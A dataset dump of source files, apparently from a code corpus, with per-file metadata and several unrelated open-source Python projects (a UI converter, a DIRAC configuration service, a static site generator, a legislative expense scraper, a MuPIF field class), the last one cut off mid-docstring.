repo_name
stringlengths
5
92
path
stringlengths
4
221
copies
stringclasses
19 values
size
stringlengths
4
6
content
stringlengths
766
896k
license
stringclasses
15 values
hash
int64
-9,223,277,421,539,062,000
9,223,102,107B
line_mean
float64
6.51
99.9
line_max
int64
32
997
alpha_frac
float64
0.25
0.96
autogenerated
bool
1 class
ratio
float64
1.5
13.6
config_test
bool
2 classes
has_no_keywords
bool
2 classes
few_assignments
bool
1 class
MalloyDelacroix/DownloaderForReddit
Tools/ui_converter.py
1
5130
#!/usr/bin/env python import sys import os import subprocess class Converter: base_ui_path = os.path.relpath('Resources/ui_files') base_out_path = os.path.relpath('DownloaderForReddit/guiresources') def __init__(self, ui_file): self.ui_file = ui_file self.callable_methods = [ 'about', 'add_reddit_object', 'core_settings', 'database_dialog', 'database_settings', 'display_settings', 'download_settings', 'export_wizard', 'notification_settings', 'output_settings', 'filter_input', 'filter_widget', 'main_window', 'object_info', 'object_settings', 'quick_filter_settings', 'reddit_object_dialog', 'schedule_settings', 'settings', 'update_dialog', 'invalid_dialog', 'existing_names_dialog', ] def run(self): if self.ui_file == 'list': self.list_methods() self.ui_file = input('GUI file name (or number): ') try: name = self.get_method() method = getattr(self, name) method() print('Conversion successful') except AttributeError: print(f'Command not recognized. Choices are: ') self.list_methods() def get_method(self): try: index = int(self.ui_file) return self.callable_methods[index] except ValueError: return self.ui_file def list_methods(self): for x, y in enumerate(self.callable_methods): print(f'{x}: {y}') def convert(self, name, *sub_paths): original = os.getcwd() os.chdir(os.path.dirname(original)) # change directories so that all file paths in created file are correct in_path = self.get_in_path(name, *sub_paths) out_path = self.get_out_path(name, *sub_paths) command = f'pyuic5 {in_path} -o {out_path}' # print(command) subprocess.run(command) os.chdir(original) def get_in_path(self, name, *sub_paths): name = f'{name}.ui' return os.path.join(self.base_ui_path, *sub_paths, name) def get_out_path(self, name, *sub_paths): name = f'{name}_auto.py' return os.path.join(self.base_out_path, *sub_paths, name) def about(self): name = 'about_dialog' self.convert(name) def add_reddit_object(self): name = 'add_reddit_object_dialog' self.convert(name) def main_window(self): name = 'downloader_for_reddit_gui' self.convert(name) def reddit_object_dialog(self): name = 'reddit_object_settings_dialog' self.convert(name) def update_dialog(self): name = 'update_dialog' self.convert(name) def database_dialog(self): name = 'database_dialog' self.convert(name, 'database_views') def filter_input(self): name = 'filter_input_widget' self.convert(name, 'database_views') def filter_widget(self): name = 'filter_widget' self.convert(name, 'database_views') def core_settings(self): name = 'core_settings_widget' self.convert(name, 'settings') def database_settings(self): name = 'database_settings_widget' self.convert(name, 'settings') def display_settings(self): name = 'display_settings_widget' self.convert(name, 'settings') def download_settings(self): name = 'download_settings_widget' self.convert(name, 'settings') def export_wizard(self): name = 'export_wizard' self.convert(name) def notification_settings(self): name = 'notification_settings_widget' self.convert(name, 'settings') def output_settings(self): name = 'output_settings_widget' self.convert(name, 'settings') def quick_filter_settings(self): name = 'quick_filter_settings_widget' self.convert(name, 'settings') def schedule_settings(self): name = 'schedule_settings_widget' self.convert(name, 'settings') def settings(self): name = 'settings_dialog' self.convert(name, 'settings') def object_info(self): name = 'object_info_widget' self.convert(name, 'widgets') def object_settings(self): name = 'object_settings_widget' self.convert(name, 'widgets') def invalid_dialog(self): name = 'invalid_reddit_object_dialog' self.convert(name) def existing_names_dialog(self): name = 'existing_names_dialog' self.convert(name) def user_auth_wizard(self): name = 'user_auth_wizard' self.convert(name) def main(): try: command = sys.argv[1] except IndexError: print('No class specified') command = input('GUI Name (or number): ') converter = Converter(command) converter.run() if __name__ == '__main__': main()
gpl-3.0
8,101,822,332,021,041,000
26.433155
116
0.571345
false
3.868778
false
false
false
duncan-r/SHIP
ship/utils/fileloaders/fileloader.py
1
2254
""" Summary: Main file loader for the API. This offers convenience methods to make it simple to load any type of file from one place. Author: Duncan Runnacles Created: 01 Apr 2016 Copyright: Duncan Runnacles 2016 TODO: Updates: """ from __future__ import unicode_literals from ship.utils import utilfunctions as uuf from ship.utils.fileloaders import tuflowloader from ship.utils.fileloaders import iefloader from ship.utils.fileloaders import datloader import logging logger = logging.getLogger(__name__) """logging references with a __name__ set to this module.""" class FileLoader(object): """ """ def __init__(self): """ """ self._known_files = {'ief': iefloader.IefLoader, 'tcf': tuflowloader.TuflowLoader, 'dat': datloader.DatLoader, 'ied': datloader.DatLoader} self.warnings = [] def loadFile(self, filepath, arg_dict={}): """Load a file from disk. Args: filepath (str): the path to the file to load. arg_dict={}(Dict): contains keyword referenced arguments needed by any of the loaders. E.g. the TuflowLoader can take some scenario values. Returns: The object created by the individual file loaders. E.g. for .dat files this will be an IsisUnitCollection. See the individual ALoader implementations for details of return types. Raises: AttributeError: if the file type is not tcf/dat/ief/ied. See Also: :class:'ALoader' :class:'IefLoader' :class:'TuflowLoader' :class:'DatLoader' """ ext = uuf.fileExtensionWithoutPeriod(filepath) if not ext.lower() in self._known_files: logger.error('File type %s is not currently supported for loading' % ext) raise AttributeError('File type %s is not currently supported for loading' % ext) loader = self._known_files[ext]() contents = loader.loadFile(filepath, arg_dict) self.warnings = loader.warnings del loader return contents
mit
366,836,191,615,290,940
26.82716
93
0.60071
false
4.285171
false
false
false
arrabito/DIRAC
ConfigurationSystem/Service/ConfigurationHandler.py
1
3918
""" The CS! (Configuration Service) """ __RCSID__ = "$Id$" from DIRAC.Core.Utilities.ReturnValues import S_OK, S_ERROR from DIRAC.ConfigurationSystem.private.ServiceInterface import ServiceInterface from DIRAC.Core.DISET.RequestHandler import RequestHandler from DIRAC.Core.Utilities import DErrno gServiceInterface = None gPilotSynchronizer = None def initializeConfigurationHandler(serviceInfo): global gServiceInterface gServiceInterface = ServiceInterface(serviceInfo['URL']) return S_OK() class ConfigurationHandler(RequestHandler): """ The CS handler """ types_getVersion = [] def export_getVersion(self): return S_OK(gServiceInterface.getVersion()) types_getCompressedData = [] def export_getCompressedData(self): sData = gServiceInterface.getCompressedConfigurationData() return S_OK(sData) types_getCompressedDataIfNewer = [basestring] def export_getCompressedDataIfNewer(self, sClientVersion): sVersion = gServiceInterface.getVersion() retDict = {'newestVersion': sVersion} if sClientVersion < sVersion: retDict['data'] = gServiceInterface.getCompressedConfigurationData() return S_OK(retDict) types_publishSlaveServer = [basestring] def export_publishSlaveServer(self, sURL): gServiceInterface.publishSlaveServer(sURL) return S_OK() types_commitNewData = [basestring] def export_commitNewData(self, sData): global gPilotSynchronizer credDict = self.getRemoteCredentials() if 'DN' not in credDict or 'username' not in credDict: return S_ERROR("You must be authenticated!") res = gServiceInterface.updateConfiguration(sData, credDict['username']) if not res['OK']: return res # Check the flag for updating the pilot 3 JSON file if self.srv_getCSOption('UpdatePilotCStoJSONFile', False) and gServiceInterface.isMaster(): if gPilotSynchronizer is None: try: # This import is only needed for the Master CS service, making it conditional avoids # dependency on the git client preinstalled on all the servers running CS slaves from DIRAC.WorkloadManagementSystem.Utilities.PilotCStoJSONSynchronizer import PilotCStoJSONSynchronizer except ImportError as exc: self.log.exception("Failed to import PilotCStoJSONSynchronizer", repr(exc)) return S_ERROR(DErrno.EIMPERR, 'Failed to import PilotCStoJSONSynchronizer') gPilotSynchronizer = PilotCStoJSONSynchronizer() return gPilotSynchronizer.sync() return res types_writeEnabled = [] def export_writeEnabled(self): return S_OK(gServiceInterface.isMaster()) types_getCommitHistory = [] def export_getCommitHistory(self, limit=100): if limit > 100: limit = 100 history = gServiceInterface.getCommitHistory() if limit: history = history[:limit] return S_OK(history) types_getVersionContents = [list] def export_getVersionContents(self, versionList): contentsList = [] for version in versionList: retVal = gServiceInterface.getVersionContents(version) if retVal['OK']: contentsList.append(retVal['Value']) else: return S_ERROR("Can't get contents for version %s: %s" % (version, retVal['Message'])) return S_OK(contentsList) types_rollbackToVersion = [basestring] def export_rollbackToVersion(self, version): retVal = gServiceInterface.getVersionContents(version) if not retVal['OK']: return S_ERROR("Can't get contents for version %s: %s" % (version, retVal['Message'])) credDict = self.getRemoteCredentials() if 'DN' not in credDict or 'username' not in credDict: return S_ERROR("You must be authenticated!") return gServiceInterface.updateConfiguration(retVal['Value'], credDict['username'], updateVersionOption=True)
gpl-3.0
-4,709,197,104,656,305,000
33.368421
114
0.710822
false
4.085506
true
false
false
lunixbochs/nullstatic
gen.py
1
2581
#!/usr/bin/env python2 from collections import defaultdict from datetime import date, datetime from email.Utils import formatdate import frontmatter import jinja2 import markdown import os import sys import time import yaml @jinja2.contextfilter def _render(context, data): return env.from_string(data['source']).render(**context) def datekey(entry): d = entry.get('date', date.min) if isinstance(d, date): d = datetime.combine(d, datetime.min.time()) return d def strip_path(base, path): return path.replace(base, '', 1).lstrip(os.sep) def gen(base, out): env = jinja2.Environment(trim_blocks=True, lstrip_blocks=True, loader=jinja2.FileSystemLoader(base)) env.filters['render'] = _render env.filters['markdown'] = markdown.markdown env.filters['date'] = lambda x: x.strftime('%Y-%m-%d') env.filters['rfc822'] = lambda x: formatdate(time.mktime(x.timetuple())) env.filters['datesort'] = lambda x: sorted(x, key=lambda k: datekey(k)) tree = defaultdict(list) for root, dirs, files in os.walk(base): root = strip_path(base, root) for name in files: if name.endswith('.j2'): path = os.path.join(base, root, name) post = frontmatter.load(path) data = {'name': name.rsplit('.', 1)[0], 'src': path, 'source': post.content} data.update(post) data['ext'] = data.get('ext', (os.path.splitext(data.get('render', ''))[1] if not '.' in data['name'] else '')) data['url'] = data.get('url', data['name']) + data['ext'] data['dst'] = os.path.join(out, os.path.dirname(strip_path(base, path)), data['url']) tree[root].append(data) for template in (t for ts in tree.values() for t in ts): source, render = map(template.get, ('source', 'render'), (None, '')) if source is not None: if render: source = open(os.path.join(base, render), 'r').read().decode('utf-8') ctx = {cat: templates for cat, templates in tree.items() if cat} ctx.update(tree=tree, **template) data = env.from_string(source).render(**ctx) dstdir = os.path.dirname(template['dst']) if not os.path.exists(dstdir): os.makedirs(dstdir) with open(template['dst'], 'w') as o: o.write(data.encode('utf-8')) if __name__ == '__main__': import sys if len(sys.argv) != 3: print('Usage: gen.py <src> <out>') sys.exit(1) gen(*sys.argv[1:])
mit
-623,981,896,369,554,700
37.522388
127
0.586594
false
3.506793
false
false
false
owais/django-simple-activity
simple_activity/models.py
1
1965
from django.db import models from django.utils.timezone import now from django.conf import settings from django.contrib.contenttypes.models import ContentType from filtered_contenttypes.fields import FilteredGenericForeignKey from django_pgjson.fields import JsonBField from .managers import ActionManager from . import settings as app_settings from . import registry def _default_action_meta(): return {} class Action(models.Model): item_type = models.ForeignKey(ContentType, related_name='actions') item_id = models.PositiveIntegerField() item = FilteredGenericForeignKey('item_type', 'item_id') target_type = models.ForeignKey(ContentType, blank=True, null=True, related_name='target_actions') target_id = models.PositiveIntegerField(blank=True, null=True) target = FilteredGenericForeignKey('target_type', 'target_id') actor = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='activity') verb = models.CharField(max_length=23, choices=registry.as_model_choices()) published = models.DateTimeField(auto_now_add=True) meta = JsonBField(default=_default_action_meta, blank=True) objects = ActionManager() class Meta: abstract = app_settings.get('ACTION_MODEL') != 'simple_activity.Action' ordering = ('-published',) @classmethod def add_action(klass, verb, actor, item, target=None, published=None, meta={}): if not registry.is_valid(verb): raise ValueError('`{}` not a valid verb.'.format(verb)) published = published or now() create_kwargs = {'actor': actor, 'item': item, 'verb': verb.code} if target: create_kwargs['target'] = target create_kwargs['published'] = published klass.objects.create(**create_kwargs) @property def verb_object(self): return registry.get_from_code(self.verb)
bsd-2-clause
2,345,284,087,180,824,000
34.727273
80
0.672774
false
4.216738
false
false
false
EmanueleCannizzaro/scons
test/Clean/Option.py
1
2620
#!/usr/bin/env python # # Copyright (c) 2001 - 2016 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "test/Clean/Option.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog" """ Verify that {Set,Get}Option('clean') works correctly to control cleaning behavior. """ import os import TestSCons _python_ = TestSCons._python_ test = TestSCons.TestSCons() test.write('build.py', r""" import sys contents = open(sys.argv[2], 'rb').read() file = open(sys.argv[1], 'wb') file.write(contents) file.close() """) test.write('SConstruct', """ B = Builder(action = r'%(_python_)s build.py $TARGETS $SOURCES') env = Environment(BUILDERS = { 'B' : B }) env.B(target = 'foo.out', source = 'foo.in') mode = ARGUMENTS.get('MODE') if mode == 'not': assert not GetOption('clean') if mode == 'set-zero': assert GetOption('clean') SetOption('clean', 0) assert GetOption('clean') if mode == 'set-one': assert not GetOption('clean') SetOption('clean', 1) assert GetOption('clean') """ % locals()) test.write('foo.in', '"Foo", I say!\n') test.run(arguments='foo.out MODE=not') test.must_match(test.workpath('foo.out'), '"Foo", I say!\n') test.run(arguments='-c foo.out MODE=set-zero') test.must_not_exist(test.workpath('foo.out')) test.run(arguments='foo.out MODE=none') test.must_match(test.workpath('foo.out'), '"Foo", I say!\n') test.run(arguments='foo.out MODE=set-one') test.must_not_exist(test.workpath('foo.out')) test.pass_test() # Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
mit
-4,647,620,131,027,711,000
29.465116
94
0.711832
false
3.308081
true
false
false
olhoneles/olhoneles
montanha/management/commands/collectors/algo.py
1
12094
# -*- coding: utf-8 -*- # # Copyright (©) 2010-2013 Estêvão Samuel Procópio # Copyright (©) 2010-2013 Gustavo Noronha Silva # Copyright (©) 2013 Marcelo Jorge Vieira # Copyright (©) 2014 Wilson Pinto Júnior # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import json import operator import os import re import rows from datetime import datetime from io import BytesIO from cStringIO import StringIO from cachetools import Cache, cachedmethod from django.core.files import File from basecollector import BaseCollector from montanha.models import ( Institution, Legislature, PoliticalParty, Legislator, ExpenseNature, ArchivedExpense, Mandate ) class ALGO(BaseCollector): TITLE_REGEX = re.compile(r'\d+ - (.*)') MONEY_RE = re.compile(r'([0-9.,]+)[,.]([0-9]{2})$') def __init__(self, *args, **kwargs): super(ALGO, self).__init__(*args, **kwargs) self.base_url = 'http://al.go.leg.br' self.institution, _ = Institution.objects.get_or_create( siglum='ALGO', name=u'Assembléia Legislativa do Estado de Goiás' ) self.legislature, _ = Legislature.objects.get_or_create( institution=self.institution, date_start=datetime(2015, 1, 1), date_end=datetime(2018, 12, 31) ) self.list_of_legislators_cache = Cache(1024) self.expenses_nature_cached = {} def _normalize_party_siglum(self, siglum): names_map = { 'SDD': 'Solidariedade', } return names_map.get(siglum, siglum) def update_legislators(self): url = self.base_url + '/deputado/' html = self.retrieve_uri(url, post_process=False, force_encoding='utf-8') rows_xpath = u'//tbody/tr' fields_xpath = { u'nome': u'./td[position()=1]/a/text()', u'url': u'./td[position()=1]/a/@href', u'party': u'./td[position()=2]/text()', u'telefone': u'./td[position()=3]/text()', u'fax': u'./td[position()=4]/text()', u'email': u'./td[position()=5]/a[position()=1]/img/@title', } table = rows.import_from_xpath(BytesIO(html.encode('utf-8')), rows_xpath, fields_xpath) url_regex = re.compile(r'.*id/(\d+)') email_regex = re.compile(r'Email: (.*)') for row in table: _id = url_regex.match(row.url).group(1) email = None if row.email: email = email_regex.match(row.email).group(1).strip() party_siglum = self._normalize_party_siglum(row.party) party, party_created = PoliticalParty.objects.get_or_create( siglum=party_siglum ) self.debug(u'New party: {0}'.format(party)) legislator, created = Legislator.objects.get_or_create(name=row.nome) legislator.site = self.base_url + row.url legislator.email = email legislator.save() if created: self.debug(u'New legislator: {0}'.format(legislator)) else: self.debug(u'Found existing legislator: {0}'.format(legislator)) self.mandate_for_legislator(legislator, party, original_id=_id) @classmethod def parse_title(self, title): if '-' in title: match = self.TITLE_REGEX.search(title) if match: return match.group(1).encode('utf-8') return title.encode('utf-8') @classmethod def parse_money(self, value): match = self.MONEY_RE.search(value) if match: return float('{0}.{1}'.format( match.group(1).replace('.', '').replace(',', ''), match.group(2) )) else: raise ValueError('Cannot convert {0} to float (money)'.format(value)) def get_parlamentar_id(self, year, month, name): legislators = self.get_list_of_legislators(year, month) legislators = [i for i in legislators if i['nome'] == name] if not legislators: return return legislators[0]['id'] @cachedmethod(operator.attrgetter('list_of_legislators_cache')) def get_list_of_legislators(self, year, month): url = '{0}/transparencia/verbaindenizatoria/listardeputados?ano={1}&mes={2}'.format( self.base_url, year, month, ) data = json.loads(self.retrieve_uri(url, force_encoding='utf8').text) return data['deputados'] def find_data_for_month(self, mandate, year, month): parlamentar_id = self.get_parlamentar_id(year, month, mandate.legislator.name) if not parlamentar_id: self.debug( u'Failed to discover parlamentar_id for year={0}, month={1}, legislator={2}'.format( year, month, mandate.legislator.name, ) ) raise StopIteration url = '{0}/transparencia/verbaindenizatoria/exibir?ano={1}&mes={2}&parlamentar_id={3}'.format( self.base_url, year, month, parlamentar_id ) data = self.retrieve_uri(url, force_encoding='utf8') if u'parlamentar não prestou contas para o mês' in data.text: self.debug(u'not found data for: {0} -> {1}/{2}'.format( mandate.legislator, year, month )) raise StopIteration container = data.find('div', id='verba') if not container: self.debug('div#verba not found') table = container.find('table', recursive=False) if not table: self.debug('table.tabela-verba-indenizatoria not found') raise StopIteration group_trs = table.findAll('tr', {'class': 'verba_titulo'}) for tr in group_trs: budget_title = self.parse_title(tr.text) budget_subtitle = None while True: tr = tr.findNext('tr') if not tr: break tr_class = tr.get('class') if tr.get('class') == 'verba_titulo': break elif tr_class == 'info-detalhe-verba': for data in self.parse_detale_verba(tr, budget_title, budget_subtitle): yield data elif tr_class == 'subtotal': continue elif len(tr.findAll('td')) == 3: tds = tr.findAll('td') budget_subtitle = self.parse_title(tds[0].text) next_tr = tr.findNext('tr') break_classes = ('subtotal', 'info-detalhe-verba', 'verba_titulo') if next_tr.get('class') in break_classes: continue value_presented = self.parse_money(tds[1].text) value_expensed = self.parse_money(tds[2].text) if not value_expensed or not value_presented: continue data = { 'budget_title': budget_title, 'budget_subtitle': budget_subtitle, 'value_presented': value_presented, 'date': '1/%d/%d' % (month, year), 'value_expensed': value_expensed, 'number': 'Sem número' } self.debug(u'Generated JSON: {0}'.format(data)) yield data def parse_detale_verba(self, elem, budget_title, budget_subtitle): rows_xpath = u'//tbody/tr' fields_xpath = { u'nome': u'./td[position()=1]/text()', u'cpf_cnpj': u'./td[position()=2]/text()', u'date': u'./td[position()=3]/text()', u'number': u'./td[position()=4]/text()', u'value_presented': u'./td[position()=5]/text()', u'value_expensed': u'./td[position()=6]/text()', } table = rows.import_from_xpath( BytesIO(str(elem)), rows_xpath, fields_xpath) for row in table: data = dict(row.__dict__) data.update({ 'budget_title': budget_title, 'budget_subtitle': budget_subtitle, 'cpf_cnpj': self.normalize_cnpj_or_cpf(row.cpf_cnpj), 'value_presented': self.parse_money(row.value_presented), 'value_expensed': self.parse_money(row.value_expensed), }) self.debug(u'Generated JSON: {0}'.format(data)) yield data def get_or_create_expense_nature(self, name): if name not in self.expenses_nature_cached: try: nature = ExpenseNature.objects.get(name=name) except ExpenseNature.DoesNotExist: nature = ExpenseNature(name=name) nature.save() self.expenses_nature_cached[name] = nature return self.expenses_nature_cached[name] def update_data_for_month(self, mandate, year, month): for data in self.find_data_for_month(mandate, year, month): nature = self.get_or_create_expense_nature( '{0}: {1}'.format(data['budget_title'], data['budget_subtitle']) ) name = data.get('nome') or 'Sem nome' no_identifier = u'Sem CPF/CNPJ ({0})'.format(name) cpf_cnpj = data.get('cpf_cnpj', no_identifier) supplier = self.get_or_create_supplier(cpf_cnpj, name) date = datetime.strptime(data['date'], '%d/%m/%Y') expense = ArchivedExpense( number=data.get('number', ''), nature=nature, date=date, value=data['value_presented'], expensed=data['value_expensed'], mandate=mandate, supplier=supplier, collection_run=self.collection_run, ) expense.save() def update_images(self): mandates = Mandate.objects.filter(legislature=self.legislature, legislator__picture='') headers = { 'Referer': self.base_url + '/deputado/', 'Origin': self.base_url, } deputado_data = self.retrieve_uri(self.base_url + '/deputado/', headers=headers) for mandate in mandates: leg = mandate.legislator found_text = deputado_data.find(text=re.compile(leg.name)) if not found_text: self.debug(u'Legislator not found in page: {0}'.format(mandate.legislator.name)) continue tr = found_text.findParents('tr')[0] tds = tr.findAll('td') detail_path = tds[0].find('a')['href'] detail_url = self.base_url + detail_path detail_data = self.retrieve_uri(detail_url, headers=headers) photo_container = detail_data.find('div', {'class': re.compile(r'foto')}) photo_url = photo_container.find('img')['src'] photo_data = self.retrieve_uri(self.base_url + photo_url, post_process=False, return_content=True) photo_buffer = StringIO(photo_data) photo_buffer.seek(0) leg.picture.save(os.path.basename(photo_url), File(photo_buffer)) leg.save() self.debug('Saved %s Image URL: {0}'.format(leg.name, photo_url)) else: self.debug('All legislators have photos')
agpl-3.0
-3,635,771,197,065,837,000
34.532353
110
0.552934
false
3.617066
false
false
false
mupif/mupif
mupif/Field.py
1
42683
# # MuPIF: Multi-Physics Integration Framework # Copyright (C) 2010-2015 Borek Patzak # # Czech Technical University, Faculty of Civil Engineering, # Department of Structural Mechanics, 166 29 Prague, Czech Republic # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, # Boston, MA 02110-1301 USA # from builtins import range from builtins import object from . import Cell from . import FieldID from . import ValueType from . import BBox from . import APIError from . import MupifObject from . import Mesh from .Physics import PhysicalQuantities from .Physics.PhysicalQuantities import PhysicalQuantity from numpy import array, arange, random, zeros import numpy import copy import Pyro4 from enum import IntEnum import logging log = logging.getLogger() try: import cPickle as pickle # faster serialization if available except: import pickle # import logging - never use it here, it causes cPickle.PicklingError: Can't pickle <type 'thread.lock'>: attribute # lookup thread.lock failed # debug flag debug = 0 class FieldType(IntEnum): """ Represent the supported values of FieldType, i.e. FT_vertexBased or FT_cellBased. """ FT_vertexBased = 1 FT_cellBased = 2 @Pyro4.expose class Field(MupifObject.MupifObject, PhysicalQuantity): """ Representation of field. Field is a scalar, vector, or tensorial quantity defined on a spatial domain. The field, however is assumed to be fixed at certain time. The field can be evaluated in any spatial point belonging to underlying domain. Derived classes will implement fields defined on common discretizations, like fields defined on structured/unstructured FE meshes, FD grids, etc. .. automethod:: __init__ .. automethod:: _evaluate """ def __init__(self, mesh, fieldID, valueType, units, time, values=None, fieldType=FieldType.FT_vertexBased, objectID=0, metaData={}): """ Initializes the field instance. :param Mesh.Mesh mesh: Instance of a Mesh class representing the underlying discretization :param FieldID fieldID: Field type (displacement, strain, temperature ...) :param ValueType valueType: Type of field values (scalar, vector, tensor). Tensor is a tuple of 9 values. It is changed to 3x3 for VTK output automatically. :param Physics.PhysicalUnits units: Field value units :param Physics.PhysicalQuantity time: Time associated with field values :param values: Field values (format dependent on a particular field type, however each individual value should be stored as tuple, even scalar value) :type values: list of tuples representing individual values :param FieldType fieldType: Optional, determines field type (values specified as vertex or cell values), default is FT_vertexBased :param int objectID: Optional ID of problem object/subdomain to which field is related, default = 0 :param dict metaData: Optionally pass metadata for merging """ super(Field, self).__init__() self.mesh = mesh self.fieldID = fieldID self.valueType = valueType self.time = time self.uri = None # pyro uri; used in distributed setting # self.log = logging.getLogger() self.fieldType = fieldType self.objectID = objectID if values is None: if self.fieldType == FieldType.FT_vertexBased: ncomponents = mesh.getNumberOfVertices() else: ncomponents = mesh.getNumberOfCells() self.value = zeros((ncomponents, self.getRecordSize())) else: self.value = values if PhysicalQuantities.isPhysicalUnit(units): self.unit = units else: self.unit = PhysicalQuantities.findUnit(units) self.setMetadata('Units', self.unit.name()) self.setMetadata('Type', 'mupif.Field.Field') self.setMetadata('Type_ID', str(self.fieldID)) self.setMetadata('FieldType', str(fieldType)) self.setMetadata('ValueType', str(self.valueType)) self.updateMetadata(metaData) @classmethod def loadFromLocalFile(cls, fileName): """ Alternative constructor which loads instance directly from a Pickle module. :param str fileName: File name :return: Returns Field instance :rtype: Field """ return pickle.load(open(fileName, 'rb')) def getRecordSize(self): """ Return the number of scalars per value, depending on :obj:`valueType` passed when constructing the instance. :return: number of scalars (1,3,9 respectively for scalar, vector, tensor) :rtype: int """ if self.valueType == ValueType.Scalar: return 1 elif self.valueType == ValueType.Vector: return 3 elif self.valueType == ValueType.Tensor: return 9 else: raise ValueError("Invalid value of Field.valueType (%d)." % self.valueType) def getMesh(self): """ Obtain mesh. :return: Returns a mesh of underlying discretization :rtype: Mesh.Mesh """ return self.mesh def getValueType(self): """ Returns ValueType of the field, e.g. scalar, vector, tensor. :return: Returns value type of the receiver :rtype: ValueType """ return self.valueType def getFieldID(self): """ Returns FieldID, e.g. FID_Displacement, FID_Temperature. :return: Returns field ID :rtype: FieldID """ return self.fieldID def getFieldIDName(self): """ Returns name of the field. :return: Returns fieldID name :rtype: string """ return self.fieldID.name def getFieldType(self): """ Returns receiver field type (values specified as vertex or cell values) :return: Returns fieldType id :rtype: FieldType """ return self.fieldType def getTime(self): """ Get time of the field. :return: Time of field data :rtype: Physics.PhysicalQuantity """ return self.time def evaluate(self, positions, eps=0.0): """ Evaluates the receiver at given spatial position(s). :param positions: 1D/2D/3D position vectors :type positions: tuple, a list of tuples :param float eps: Optional tolerance for probing whether the point belongs to a cell (should really not be used) :return: field value(s) :rtype: Physics.PhysicalQuantity with given value or tuple of values """ # test if positions is a list of positions if isinstance(positions, list): ans = [] for pos in positions: ans.append(self._evaluate(pos, eps)) return PhysicalQuantity(ans, self.unit) else: # single position passed return PhysicalQuantity(self._evaluate(positions, eps), self.unit) def _evaluate(self, position, eps): """ Evaluates the receiver at a single spatial position. :param tuple position: 1D/2D/3D position vector :param float eps: Optional tolerance :return: field value :rtype: tuple of doubles .. note:: This method has some issues related to https://sourceforge.net/p/mupif/tickets/22/ . """ cells = self.mesh.giveCellLocalizer().giveItemsInBBox(BBox.BBox([c-eps for c in position], [c+eps for c in position])) # answer=None if len(cells): if self.fieldType == FieldType.FT_vertexBased: for icell in cells: try: if icell.containsPoint(position): if debug: log.debug(icell.getVertices()) try: answer = icell.interpolate(position, [self.value[i.number] for i in icell.getVertices()]) except IndexError: log.error('Field::evaluate failed, inconsistent data at cell %d' % icell.label) raise return answer except ZeroDivisionError: print('ZeroDivisionError?') log.debug(icell.number) log.debug(position) icell.debug = 1 log.debug(icell.containsPoint(position), icell.glob2loc(position)) log.error('Field::evaluate - no source cell found for position %s' % str(position)) for icell in cells: log.debug(icell.number) log.debug(icell.containsPoint(position)) log.debug(icell.glob2loc(position)) else: # if (self.fieldType == FieldType.FT_vertexBased): # in case of cell based fields do compute average of cell values containing point # this typically happens when point is on the shared edge or vertex count = 0 for icell in cells: if icell.containsPoint(position): if debug: log.debug(icell.getVertices()) try: tmp = self.value[icell.number] if count == 0: answer = list(tmp) else: for i in answer: answer = [x+y for x in answer for y in tmp] count += 1 except IndexError: log.error('Field::evaluate failed, inconsistent data at cell %d' % icell.label) log.error(icell.getVertices()) raise # end loop over icells if count == 0: log.error('Field::evaluate - no source cell found for position %s', str(position)) # for icell in cells: # log.debug(icell.number, icell.containsPoint(position), icell.glob2loc(position)) else: answer = [x/count for x in answer] return answer else: # no source cell found log.error('Field::evaluate - no source cell found for position ' + str(position)) raise ValueError('Field::evaluate - no source cell found for position ' + str(position)) def getVertexValue(self, vertexID): """ Returns the value associated with a given vertex. :param int vertexID: Vertex identifier :return: The value :rtype: Physics.PhysicalQuantity """ if self.fieldType == FieldType.FT_vertexBased: return PhysicalQuantity(self.value[vertexID], self.unit) else: raise TypeError('Attempt to acces vertex value of cell based field, use evaluate instead') def getCellValue(self, cellID): """ Returns the value associated with a given cell. :param int cellID: Cell identifier :return: The value :rtype: Physics.PhysicalQuantity """ if self.fieldType == FieldType.FT_cellBased: return PhysicalQuantity(self.value[cellID], self.unit) else: raise TypeError('Attempt to acces cell value of vertex based field, use evaluate instead') def _giveValue(self, componentID): """ Returns the value associated with a given component (vertex or cell). Depreceated, use getVertexValue() or getCellValue() :param int componentID: An identifier of a component: vertexID or cellID :return: The value :rtype: Physics.PhysicalQuantity """ return PhysicalQuantity(self.value[componentID], self.unit) def giveValue(self, componentID): """ Returns the value associated with a given component (vertex or cell). :param int componentID: An identifier of a component: vertexID or cellID :return: The value :rtype: tuple """ return self.value[componentID] def setValue(self, componentID, value): """ Sets the value associated with a given component (vertex or cell). :param int componentID: An identifier 